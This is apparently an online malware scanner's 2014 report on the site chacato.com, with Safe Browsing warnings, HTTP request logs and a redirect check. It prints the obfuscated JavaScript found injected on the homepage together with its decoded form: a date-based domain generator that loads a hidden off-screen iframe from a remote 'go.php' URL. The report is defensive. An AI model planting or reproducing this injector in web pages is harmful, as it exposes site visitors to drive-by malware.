Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=chacato.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://chacato.com/ | 200 OK Content-Length: 20086 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI Decoded script: var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas"; var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9]; var ah = new Date().getDate()+1; var url="http://"; for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1); url+=".org/ts/go.php?q=1"; fff="fram"; if (document.getElementsByTagName('body')[0]) { iframer();} else { document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></ var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://ch3fhf57fbd.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe> Antivirus reports:
| ||
http://chacato.com/test404page.js | 404 Not Found Content-Length: 3671 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: chacato.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Jun 2014 04:56:10 GMT
Accept-Ranges: bytes
ETag: "4e76"
Server: Apache
Vary: *
Content-Length: 20086
Content-Type: text/html
Last-Modified: Wed, 02 Jan 2013 16:45:44 GMT
...20086 bytes of data.
GET / HTTP/1.1
Host: chacato.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Jun 2014 04:56:10 GMT
Accept-Ranges: bytes
ETag: "4e76"
Server: Apache
Vary: *
Content-Length: 20086
Content-Type: text/html
Last-Modified: Wed, 02 Jan 2013 16:45:44 GMT
...20086 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: chacato.com
Referer: http://www.google.com/search?q=chacato.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: chacato.com
Referer: http://www.google.com/search?q=chacato.com
Result:
The result is similar to the first query. There are no suspicious redirects found.